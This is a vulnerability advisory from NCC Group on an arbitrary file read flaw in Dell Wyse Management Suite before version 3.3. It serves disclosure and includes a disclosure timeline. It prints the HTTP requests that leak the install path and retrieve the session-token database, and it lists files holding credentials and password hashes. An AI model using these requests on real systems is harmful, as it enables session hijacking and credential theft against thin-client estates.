Vendor: Dell
Vendor URL: https://www.dell.com/support/home/en-us/product-support/product/wyse-wms/drivers
Versions affected: Prior to version 3.3
Systems Affected: Any
Author: Stephen Tomkinson stephen.tomkinson@nccgroup.com
Advisory URL / CVE Identifier: https://www.dell.com/support/kbdoc/en-us/000189363/dsa-2021-137-dell-wyse-management-suite-wms-security-update-for-multiple-vulnerabilities CVE-2021-21586, CVE-2021-21587
Risk: High – can lead to compromise of administrative sessions
Summary
Thin clients are often found in secure environments as their diskless operation reduces physical security risks. Wyse Management Suite (WMS) acts a central hub for Dell’s thin client hardware, providing centralised provisioning and configuration. The Wyse Management Suite web interface and the configuration services used by the Thin Clients on boot are part of the same web application it is therefore one of the few services which must be exposed to the edge network connections even in secure environments.
On affected versions of WMS, it is possible to retrieve arbitrary files from the server, including database credentials and database files containing the session data of administrative users.
Location
The /ccm-web/image/os endpoint accepted a filePath and fileName parameter which would retrieve files from anywhere on the operating system, e.g. GET /ccm-web/image/os filePath=c:windows fileName=win.ini
Exploitation was aided by a second endpoint which revealed the path the product was installed to via a verbose error message. This could be trigger with PUT /ccm-web/image/pull/a/b
Impact
An attacker with physical access to a thin client and its network connection can exploit this vulnerability to gain access to the management interface of the whole thin client estate. The management interface includes features such as resetting BIOS passwords and remotely shadowing terminal screens via VNC.
Details
Access to the vulnerable endpoint was authenticated with a Wyse device ID. This ID can be retrieved from a configured Wyse thin client using a man-in-the-middle attack. As the WMS is used to provision TLS certificates, communication between a thin client and the WMS is often performed over TLS but without verification of the server certificate. This can be forced by a DNS or DHCP setting retrieved by the thin client early in the boot process.
With a valid device ID, a request to the vulnerable endpoints can be made, first to obtain the installation path of the software:
PUT /ccm-web/image/pull/a/b HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149
Which resulted in the following error, revealing the internal path:
HTTP/1.1 500
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=4443165646FDA1BA417D08917BFD17C7; Path=/ccm-web; Secure; HttpOnly
X-Content-Type-Options: nosniff
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 107
Date: Fri, 16 Apr 2021 10:51:51 GMT
Connection: close
E:Program FilesDELLSoftwarerepositoryimagePullstagingab (The system cannot find the path specified)
Then to the vulnerable endpoint to retrieve files:
GET /ccm-web/image/os?filePath=E:Program FilesDELLWMSDatabaseSQLstratus fileName= persistentlogin.ibd HTTP/1.1
Host: [redacted]
X-Stratus-device-id:wyse106[redacted]3149
Resulting in retrieval of the embedded MySQL database table that held the session tokens for authenticated users of the WMS. Extracting the JSESSIONID cookie value from this table permitted session hijacking.
Additional files of interest to an attacker include:
Path | Contains |
{install_path}Tomcat-9webappsccm-webWEB-INFclassesbootstrap.properties | Database credentials encrypted with a fixed key |
{install_path}DatabaseSQLstratusperson.ibd | Passwords for WMS administrative users, hashed as SHA256(MD5(pass),salt) |
Recommendation
Update to version 3.3 of Wyse Management Suite.
Vendor Communication
NCC Group Notifies Vendor: 7th May 2021
Vendor Replies Requesting More Details: 11th May 2021
NCC Group Sends Requested information: 11th May 2021
Vendor Confirms The Vulnerability: 20th May 2021
NCC Group Requests a Patch Date: 18th June 2021
Vendor Response With Date: 18th June 2021
Patch Advisory Published: July 6th 2021
Thanks to
Dave Cash at NCC Group
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
Published date: 6th July 2021
Written by: Stephen Tomkinson